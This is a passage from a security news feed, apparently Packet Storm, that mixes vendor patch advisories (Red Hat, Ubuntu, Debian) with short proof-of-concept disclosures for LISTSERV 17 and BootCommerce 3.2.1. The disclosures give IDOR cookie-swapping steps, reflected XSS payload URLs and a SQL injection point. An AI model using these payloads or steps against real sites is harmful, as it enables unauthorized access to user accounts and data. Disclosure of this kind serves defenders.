Red Hat Security Advisory 2023-0173-01 - The libxml2 library is a development toolbox providing the implementation of various XML standards. Issues addressed include an integer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: libxml2 security update  
Advisory ID:       RHSA-2023:0173-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0173  
Issue date:        2023-01-16  
CVE Names:         CVE-2022-40303 CVE-2022-40304  
====================================================================  
1. Summary:

An update for libxml2 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libxml2 library is a development toolbox providing the implementation  
of various XML standards.

Security Fix(es):

* libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)

* libxml2: dict corruption caused by entity reference cycles  
(CVE-2022-40304)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The desktop must be restarted (log out, then log back in) for this update  
to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE  
2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
libxml2-debuginfo-2.9.7-15.el8_7.1.aarch64.rpm  
libxml2-debugsource-2.9.7-15.el8_7.1.aarch64.rpm  
libxml2-devel-2.9.7-15.el8_7.1.aarch64.rpm  
python3-libxml2-debuginfo-2.9.7-15.el8_7.1.aarch64.rpm

ppc64le:  
libxml2-debuginfo-2.9.7-15.el8_7.1.ppc64le.rpm  
libxml2-debugsource-2.9.7-15.el8_7.1.ppc64le.rpm  
libxml2-devel-2.9.7-15.el8_7.1.ppc64le.rpm  
python3-libxml2-debuginfo-2.9.7-15.el8_7.1.ppc64le.rpm

s390x:  
libxml2-debuginfo-2.9.7-15.el8_7.1.s390x.rpm  
libxml2-debugsource-2.9.7-15.el8_7.1.s390x.rpm  
libxml2-devel-2.9.7-15.el8_7.1.s390x.rpm  
python3-libxml2-debuginfo-2.9.7-15.el8_7.1.s390x.rpm

x86_64:  
libxml2-debuginfo-2.9.7-15.el8_7.1.i686.rpm  
libxml2-debuginfo-2.9.7-15.el8_7.1.x86_64.rpm  
libxml2-debugsource-2.9.7-15.el8_7.1.i686.rpm  
libxml2-debugsource-2.9.7-15.el8_7.1.x86_64.rpm  
libxml2-devel-2.9.7-15.el8_7.1.i686.rpm  
libxml2-devel-2.9.7-15.el8_7.1.x86_64.rpm  
python3-libxml2-debuginfo-2.9.7-15.el8_7.1.i686.rpm  
python3-libxml2-debuginfo-2.9.7-15.el8_7.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
libxml2-2.9.7-15.el8_7.1.src.rpm

aarch64:  
libxml2-2.9.7-15.el8_7.1.aarch64.rpm  
libxml2-debuginfo-2.9.7-15.el8_7.1.aarch64.rpm  
libxml2-debugsource-2.9.7-15.el8_7.1.aarch64.rpm  
python3-libxml2-2.9.7-15.el8_7.1.aarch64.rpm  
python3-libxml2-debuginfo-2.9.7-15.el8_7.1.aarch64.rpm

ppc64le:  
libxml2-2.9.7-15.el8_7.1.ppc64le.rpm  
libxml2-debuginfo-2.9.7-15.el8_7.1.ppc64le.rpm  
libxml2-debugsource-2.9.7-15.el8_7.1.ppc64le.rpm  
python3-libxml2-2.9.7-15.el8_7.1.ppc64le.rpm  
python3-libxml2-debuginfo-2.9.7-15.el8_7.1.ppc64le.rpm

s390x:  
libxml2-2.9.7-15.el8_7.1.s390x.rpm  
libxml2-debuginfo-2.9.7-15.el8_7.1.s390x.rpm  
libxml2-debugsource-2.9.7-15.el8_7.1.s390x.rpm  
python3-libxml2-2.9.7-15.el8_7.1.s390x.rpm  
python3-libxml2-debuginfo-2.9.7-15.el8_7.1.s390x.rpm

x86_64:  
libxml2-2.9.7-15.el8_7.1.i686.rpm  
libxml2-2.9.7-15.el8_7.1.x86_64.rpm  
libxml2-debuginfo-2.9.7-15.el8_7.1.i686.rpm  
libxml2-debuginfo-2.9.7-15.el8_7.1.x86_64.rpm  
libxml2-debugsource-2.9.7-15.el8_7.1.i686.rpm  
libxml2-debugsource-2.9.7-15.el8_7.1.x86_64.rpm  
python3-libxml2-2.9.7-15.el8_7.1.x86_64.rpm  
python3-libxml2-debuginfo-2.9.7-15.el8_7.1.i686.rpm  
python3-libxml2-debuginfo-2.9.7-15.el8_7.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY8UoQ9zjgjWX9erEAQgOHQ/+Ns7MY8MsoyU3wlWkuTW5mCenVYaSQa90  
nHACMcvLgOKjM61s7FTXHnvV52TKj/+kZRToW2MCOTfuLsYnP0bZ+DFLkhDxoIGR  
wN6X2Mgh/vtBmdLGtW8bjclpJuYLoGrjfoigFOZgXbRrKBNYLZqLPNutHzcF1IB2  
hxdTDn7W+RNjCiP8+l+cTGYx0A9e1rYkCEx5B8qKfJY11/ojBTvxMf2jVnkFM9gz  
ZwVCDtUyO7S7B5l6OqvH9qcR8dBOMw5KpaE4wGc+RF9iYI3t68xJlB2bj21Eb1oW  
I4OwkkOh9i96f2XtusnTZIdJWVEMHJ3ZjM8a40nB7OzV0zSRRml61CLvLur6YAdo  
nxQ3bstsq2+NhK/J0pHLUaVLQxeePgvHICJBIBXRV/bFHZw3qADo08FmvcVh4y9t  
HSyYP6ZdofwxeR6elSke2cM57RWIcDVB8+o6ESUN4q5QMp6xjmA+82tHLmbguwyb  
RMTW46jCZ3tZOo5+zIXBGlwvMZGv5PDzzgjwEboxBoWTGegBdPJkNNmezj9pZcyB  
0l2Uh2LtC/uPbqBFzsPy94pyEd4VoRAY5/RBS+PgLCJm4o2qsaTN75jqHpSQXgw8  
CfZT3+0XnYvsYHBt8jtiVUpHJpbfh9vNNjXzcLO/JKCv8NW3So1MfV2A+mT/mDmh  
nCQ8kAI62fw=pLiQ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0173-01

Ubuntu Security Notice 5805-1 - It was discovered that Apache Maven followed repositories that are defined in a dependency’s Project Object Model even if the repositories weren't encryptedh. An attacker could use this vulnerability to take over a repository, execute arbitrary code or cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5805-1January 16, 2023maven vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10Summary:Apache Maven could be made to crash or run programs if it receivedspecially crafted input.Software Description:- maven: Java software project management and comprehension toolDetails:It was discovered that Apache Maven followed repositories that are definedin a dependency’s Project Object Model (pom) even if the repositoriesweren't encryptedh (http protocol). An attacker could use thisvulnerability to take over a repository, execute arbitrary code or cause adenial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  libmaven3-core-java             3.6.3-5ubuntu1.1  maven                           3.6.3-5ubuntu1.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5805-1  CVE-2021-26291, https://launchpad.net/bugs/1999254Package Information:  https://launchpad.net/ubuntu/+source/maven/3.6.3-5ubuntu1.1

Ubuntu Security Notice USN-5805-1

LISTSERV version 17 suffers from an insecure direct object reference vulnerability that allows illicit access to a target's profile.

    # Exploit Title: LISTSERV 17 - Insecure Direct Object Reference (IDOR)# Exploit Author: Shaunt D# Vendor Homepage: https://www.lsoft.com/# Version: 17# Tested on: Windows Server 2019# CVE : CVE-2022-40319# Steps to replicate1. Create two accounts on your LISTSERV 17 installation, logging into each one in a different browser or container.2. Intercept your attacking profile's browser traffic using Burp.3. When logging in, you'll be taken to a URL with your email address in the Y parameter (i.e. http://example.com/scripts/wa.exe?INDEX&X=[session-id]&Y=[email-address]).4. Click on your email address on the top right and select "Edit profile".5. In Burp, change the email address in the URL's Y parameter to the email address of your victim account.4. Next, the "WALOGIN" cookie value will be an ASCII encoded version of your email address. Using Burp Decoder, ASCII encode your victim's email address and replace the "WALOGIN" cookie value with that.5. Submit this request. You should now be accessing/editing the victim's profile. You can make modifications and access any information in this profile as long as you replace those two values in Burp for each request.

LISTSERV 17 Insecure Direct Object Reference

LISTSERV version 17 suffers from a cross site scripting vulnerability.

    # Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting (XSS)# Exploit Author: Shaunt D# Vendor Homepage: https://www.lsoft.com/# Version: 17# Tested on: Windows Server 2019# CVE : CVE-2022-39195A reflected cross-site scripting (XSS) vulnerability in the LISTSERV 17 web interface allows remote attackers to inject arbitrary JavaScript or HTML via the "c" parameter.To reproduce, please visithttp://localhost/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E(or whichever URL you can use for testing instead of localhost).The "c" parameter will reflect any value given onto the page.# SolutionThis vulnerability can be mitigated by going under "Server Administration" to "Web Templates" and editing the BODY-LCMD-MESSAGE web template. Change &+CMD; to &+HTMLENCODE(&+CMD;); .

LISTSERV 17 Cross Site Scripting

Ubuntu Security Notice 5804-2 - It was discovered that the NFSD implementation in the Linux kernel did not properly handle some RPC messages, leading to a buffer overflow. A remote attacker could use this to cause a denial of service or possibly execute arbitrary code. Tamás Koczka discovered that the Bluetooth L2CAP handshake implementation in the Linux kernel contained multiple use-after-free vulnerabilities. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5804-2  
January 13, 2023

linux-aws, linux-gcp-4.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems

Details:

It was discovered that the NFSD implementation in the Linux kernel did not  
properly handle some RPC messages, leading to a buffer overflow. A remote  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-43945)

Tamás Koczka discovered that the Bluetooth L2CAP handshake implementation  
in the Linux kernel contained multiple use-after-free vulnerabilities. A  
physically proximate attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-42896)

It was discovered that the Xen netback driver in the Linux kernel did not  
properly handle packets structured in certain ways. An attacker in a guest  
VM could possibly use this to cause a denial of service (host NIC  
availability). (CVE-2022-3643)

It was discovered that an integer overflow vulnerability existed in the  
Bluetooth subsystem in the Linux kernel. A physically proximate attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-45934)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   linux-image-4.15.0-1143-gcp     4.15.0-1143.159  
   linux-image-4.15.0-1148-aws     4.15.0-1148.160  
   linux-image-aws-lts-18.04       4.15.0.1148.146  
   linux-image-gcp-lts-18.04       4.15.0.1143.157

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5804-2  
   https://ubuntu.com/security/notices/USN-5804-1  
   CVE-2022-3643, CVE-2022-42896, CVE-2022-43945, CVE-2022-45934

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1148.160  
   https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1143.159

Ubuntu Security Notice USN-5804-2

Red Hat Security Advisory 2023-0168-01 - The dpdk packages provide the Data Plane Development Kit, which is a set of libraries and drivers for fast packet processing in the user space. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: dpdk security update  
Advisory ID:       RHSA-2023:0168-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0168  
Issue date:        2023-01-16  
CVE Names:         CVE-2022-2132   
=====================================================================

1. Summary:

An update for dpdk is now available for Red Hat Enterprise Linux 8.1 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, noarch, ppc64le, x86_64

3. Description:

The dpdk packages provide the Data Plane Development Kit, which is a set of  
libraries and drivers for fast packet processing in the user space.

Security Fix(es):

* dpdk: DoS when a Vhost header crosses more than two descriptors and  
exhausts all mbufs (CVE-2022-2132)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2099475 - CVE-2022-2132 dpdk: DoS when a Vhost header crosses more than two descriptors and exhausts all mbufs

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
dpdk-18.11.2-5.el8_1.src.rpm

aarch64:  
dpdk-18.11.2-5.el8_1.aarch64.rpm  
dpdk-debuginfo-18.11.2-5.el8_1.aarch64.rpm  
dpdk-debugsource-18.11.2-5.el8_1.aarch64.rpm  
dpdk-devel-18.11.2-5.el8_1.aarch64.rpm  
dpdk-devel-debuginfo-18.11.2-5.el8_1.aarch64.rpm  
dpdk-tools-18.11.2-5.el8_1.aarch64.rpm

noarch:  
dpdk-doc-18.11.2-5.el8_1.noarch.rpm

ppc64le:  
dpdk-18.11.2-5.el8_1.ppc64le.rpm  
dpdk-debuginfo-18.11.2-5.el8_1.ppc64le.rpm  
dpdk-debugsource-18.11.2-5.el8_1.ppc64le.rpm  
dpdk-devel-18.11.2-5.el8_1.ppc64le.rpm  
dpdk-devel-debuginfo-18.11.2-5.el8_1.ppc64le.rpm  
dpdk-tools-18.11.2-5.el8_1.ppc64le.rpm

x86_64:  
dpdk-18.11.2-5.el8_1.x86_64.rpm  
dpdk-debuginfo-18.11.2-5.el8_1.x86_64.rpm  
dpdk-debugsource-18.11.2-5.el8_1.x86_64.rpm  
dpdk-devel-18.11.2-5.el8_1.x86_64.rpm  
dpdk-devel-debuginfo-18.11.2-5.el8_1.x86_64.rpm  
dpdk-tools-18.11.2-5.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2132  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY8UoQNzjgjWX9erEAQhI2w//Rp5ODsEUvVZ1xJjSB9w2PMi+ha1gqLg+  
smBl+kBkHC0lxjyyS9QJ+yhzdW6vauLIdWlL5FX4lr2EiPgElBNoICJEVZ63i5Sp  
BliQTMDfYJnjVxc+QtkzL3/qGme9BnF2PmoP563La5ud7g1o5pYJrfePhEil56Mv  
KFQWAme6Yww/nNwnZCEtCFLHncpWAms2pLrPf/hLltb+D36+fc5ZhUY47mTQ/cXw  
8LRWOjRB08NXotWdKBopc57PN7Ik8zSW8ORnGOmhGOUmiQjyTddvU3MMa5h+M262  
1U27bwoPDnkAaQD8nzumEfHc05UnZCvu5+mxyLeNn8x1jcWFzYla1Y/wMY5SwXU7  
qWmN2WhxsW76HAp0KJ+2Np33rxiR2r4+s3ww0NBnuikfRT5QbU5cCd5T8hUmrxQU  
2y/ZnFAfDI0tii+CfVXKlHRHHV6TjiPwpG3JorTBz1CwoYjmL/xDvS9u1KHxnC6E  
mm0fJAkFwmDg8YqJ56JYLMGOOxnESjqRpb3/5FUnQYf8uglJ5pkc0ryRqE7Ki5/S  
PocJo3BBZ56WjawtsSnaQPn3Ex1HMqjNxDJhKaPSQ1o/KuNKT6CUVltzsD1Sn5Ny  
5n+1Peis7PIgF9QPQGgaie1pwuE1JDJiYNfqkPXU+BovZZHsAPDR1hW4jftHpQDN  
bgTT5U4dUxA=  
=4h8r  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0168-01

Debian Linux Security Advisory 5319-1 - Two vulnerabilities were discovered in the LLPD implementation of Open vSwitch, software-based Ethernet virtual switch, which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5319-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 13, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openvswitchCVE ID         : CVE-2022-4337 CVE-2022-4338Debian Bug     : 1027273Two vulnerabilities were discovered in the LLPD implementation of OpenvSwitch, software-based Ethernet virtual switch, which could result indenial of service.For the stable distribution (bullseye), these problems have been fixed inversion 2.15.0+ds1-2+deb11u2.We recommend that you upgrade your openvswitch packages.For the detailed security status of openvswitch please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openvswitchFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPBrj0ACgkQEMKTtsN8TjbVVw/+OXr/AQa61Y04slO3uhOLOa+llhszDFjIGlWFWlqMEg7CItYhqEdAf3nCelZy2/wqtv4VIMrz8IW+qDWSMkitgjWqbmn3dG92VhcLFD3Dq1RGXg3B8x22MMtGsBGYIfUPhDbG97NE4tqr2itN0ubl9Z8mnOFVv3D9eqxJT3df9WXMVZpX+jHiSMU3uLLhHor9rRBWpu3DEW5Cc6jLLghuN2FS2FADiUtf5MLAUk7gR1CRqOQm+41yNoBPqBF/C+OqJpHSitbVDtJjKacv/VUVgMzHt9Xf1gMNldLan9rO1MYkZaKkSuC+U5G5Kpj55we0LM/zAKRVnGFPk6QQUWHSCMG4Ae4+pRAWBX7ofwY38C6sxhUS+C9vMYao9sFZuWvKFElyQPgI/NVsUNDxYPGHRFxOXWgDyxDxNIBhf8s7QzgQBoegaaJ7A1LK4lhUsG7xQ1dmJRsB8jtYXR8v/QBNvnoU+JG1yi8yUPfD+VvAgnulKpWy/u12EVZBRot9tG39oZO0ReDGk6g/fLyHFo74gCGsjNZCHUzuk3q+axJnAH1z9Ss2Qp3g6snBo6Ku0ZxfN2hp4ylv/jXjNAP8jnQ3S94DJVZiJwlakzJD6J3pYdKzL7NWKuXhyjrAmOdQJnpZSKLr546Av5tAqoXvHCvmfTWPdbvST7cFraWs2X2StpE==a4Zt-----END PGP SIGNATURE-----

Debian Security Advisory 5319-1

Ubuntu Security Notice 5795-2 - USN-5795-1 and 5543-1 fixed several vulnerabilities in Net-SNMP. This update provides the corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. It was discovered that Net-SNMP incorrectly handled certain requests. A remote attacker could possibly use these issues to cause Net-SNMP to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5795-2January 16, 2023net-snmp vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:Several security issues were fixed in Net-SNMP.Software Description:- net-snmp: SNMP (Simple Network Management Protocol) server and applicationsDetails:USN-5795-1 and 5543-1 fixed several vulnerabilities in Net-SNMP. This update providesthe corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM.Original advisory details: It was discovered that Net-SNMP incorrectly handled certain requests. A remote attacker could possibly use these issues to cause Net-SNMP to crash, resulting in a denial of service. Yu Zhang and Nanyu Zhong discovered that Net-SNMP incorrectly handled memory operations when processing certain requests. A remote attacker could use this issue to cause Net-SNMP to crash, resulting in a denial of service, or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:  libsnmp30                       5.7.3+dfsg-1ubuntu4.6+esm1  snmp                            5.7.3+dfsg-1ubuntu4.6+esm1  snmpd                           5.7.3+dfsg-1ubuntu4.6+esm1Ubuntu 14.04 ESM:  libsnmp30                       5.7.2~dfsg-8.1ubuntu3.3+esm3  snmp                            5.7.2~dfsg-8.1ubuntu3.3+esm3  snmpd                           5.7.2~dfsg-8.1ubuntu3.3+esm3In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5795-2  https://ubuntu.com/security/notices/USN-5795-1  CVE-2022-24805, CVE-2022-24806, CVE-2022-24807, CVE-2022-24808,  CVE-2022-24809, CVE-2022-24810, CVE-2022-44792, CVE-2022-44793

Ubuntu Security Notice USN-5795-2

BootCommerce version 3.2.1 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.mrplugins.it/bootcommerce/                                     ││  Vendor   : MrPlugins                                                                  ││  Software : BootCommerce 3.2.1                                                         ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /bootcommerce/content/products/Books/?p=1&prc=5,12&of=falseGET parameter 'prc' is vulnerable to SQLIhttps://www.target.com/bootcommerce/content/products/Books/?p=1&prc=5,12[Inject-HERE]&of=false[-] Done

BootCommerce 3.2.1 SQL Injection

BootCommerce version 3.2.1 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://www.mrplugins.it/bootcommerce/                                     │  
│  Vendor   : MrPlugins                                                                  │  
│  Software : BootCommerce 3.2.1                                                         │  
│  Vuln Type: Reflected XSS                                                              │  
│  Method   : GET                                                                        │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /bootcommerce/search.php

URL parameter 'sp' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tvbmhz4%22onfocus%3d%22alert(1)%22autofocus%3d%22dlit2&of=false&sp_n=t&sp_t=t&sp_d=t&sp_mk=t&sp_w=t

URL parameter 'of' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=falsekav5w%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22h0xj6&sp_n=t&sp_t=t&sp_d=t&sp_mk=t&sp_w=t

URL parameter 'sp_n' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=tl31l3%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22h93cp&sp_t=t&sp_d=t&sp_mk=t&sp_w=t

URL parameter 'sp_t' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=tlelcw%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22lho07&sp_d=t&sp_mk=t&sp_w=t

URL parameter 'sp_d' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=t&sp_d=trhpfz%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22nfcub&sp_mk=t&sp_w=t

URL parameter 'sp_mk' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=t&sp_d=t&sp_mk=tbgy05%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22abjmb&sp_w=t

URL parameter 'sp_w' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=t&sp_d=t&sp_mk=&sp_w=tbgy05%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22abjmb

Path: /bootcommerce/content/products/Books/

URL parameter 'prc' is vulnerable to XSS

https://www.mrplugins.it/bootcommerce/content/products/Books/?p=1&prcq3h55%22%3E%3Cscript%3Ealert(1)%3C/script%3Egwsd7&of=false

[-] Done

Source

Packet Storm